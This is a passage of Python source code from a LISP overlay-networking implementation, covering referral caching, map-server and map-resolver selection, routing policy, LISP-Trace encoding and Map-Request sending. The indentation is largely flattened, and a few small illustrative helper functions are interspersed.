self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, create a lisp_ms()
        # for each additional A-record. Only the master entry (A-record
        # index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
            s.bind((device, 0))
            self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
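#
# Illustrative sketch, not part of the original module: a dynamic-EID
# interface matches any EID more specific than its configured prefix.
# The device name "eth0" and the addresses are hypothetical.
#
def lisp_interface_example():
    intf = lisp_interface("eth0")
    intf.dynamic_eid = lisp_address(LISP_AFI_IPV4, "10.1.0.0", 16, 0)
    eid = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
    return(intf.does_dynamic_eid_match(eid))
#enddef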
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
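#
# Editor's illustrative sketch (not part of the original lispers.net code):
# lisp_datetime() above compares datetimes by stripping "-" and ":" from a
# "YYYY-MM-DD-HH:MM:SS" string so the resulting integers (e.g.,
# 20240115103000) order chronologically. The same ordering trick,
# standalone (boundary semantics of now_in_range() approximated):
#
def lisp_example_datetime_in_range(lower_str, now_str, upper_str):
    to_int = lambda ds: int(ds.replace("-", "").replace(":", ""))
    return(to_int(lower_str) <= to_int(now_str) <= to_int(upper_str))
#enddef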
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
    #enddef
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
        #endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
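    #
    # Worked example (editor's addition): for a JSON body of 50 bytes,
    # packet_length() above returns 8 (UDP) + 16 (trace header) + 50 = 74.
    #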
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
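#
# Editor's illustrative sketch (not part of the original lispers.net code):
# the first 32-bit word of a LISP-Trace message packs Type=9 in the high
# nibble and the local private port in the low 16 bits, per the packet
# diagram above. Encoding and re-checking that word standalone, using the
# module-level socket and struct imports:
#
def lisp_example_trace_first_long(port):
    first_long = socket.htonl(0x90000000 | (port & 0xffff))
    packed = struct.pack("I", first_long)
    value = socket.ntohl(struct.unpack("I", packed[:4])[0])
    is_trace = ((value & 0xff000000) == 0x90000000)
    return([is_trace, value & 0xffff])
#enddef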
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
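#
# Worked example (editor's addition, hypothetical values): with a decent
# index of 5 and lisp_decent_dns_suffix "example.net", the lookup above
# selects the least recently used map-resolver whose dns_name is
# "5.example.net".
#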
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
    # Check for an IGMP packet first (protocol 2). Don't verify the IP
    # checksum and don't test TTL for IGMP packets.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
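#
# Editor's illustrative sketch (not part of the original lispers.net code):
# the verification above relies on the standard IP one's-complement
# property that recomputing the checksum over a header which still contains
# its checksum field yields 0 when the header is intact. A minimal
# standalone RFC 1071 style checksum over an even-length header:
#
def lisp_example_ipv4_checksum(header):
    csum = 0
    for i in range(0, len(header), 2):
        csum += struct.unpack("!H", header[i:i+2])[0]
    #endfor
    while (csum >> 16): csum = (csum & 0xffff) + (csum >> 16)
    return(~csum & 0xffff)
#enddef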
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
    # Did we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
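#
# Editor's illustrative sketch (hypothetical names): the rate-limit test
# above reduces to a global-timestamp comparison of this form:
#
def lisp_example_rate_limited(last_sent_timestamp, interval):
    if (last_sent_timestamp == None): return(False)
    return((time.time() - last_sent_timestamp) < interval)
#enddef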
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
    # RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
    # Hold the request nonce so we can match replies from xTRs that have
    # multiple RLOCs, since the reply's source address may not be the
    # probed destination. And in our ETR implementation, we can get the
    # probe request destination in the lisp-core/lisp-etr/lisp-rtr
    # processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
    # We do this on the ETR only so the lisp-itr and lisp-etr processes
    # don't both add and delete host routes (for Info-Request sending
    # purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
        # If we found a host route for the map-server, then both the
        # lisp-itr and lisp-etr processes are in this routine at the same
        # time. Wait for the host route to go away before proceeding. We
        # use the map-server host route as an IPC lock. For the data port,
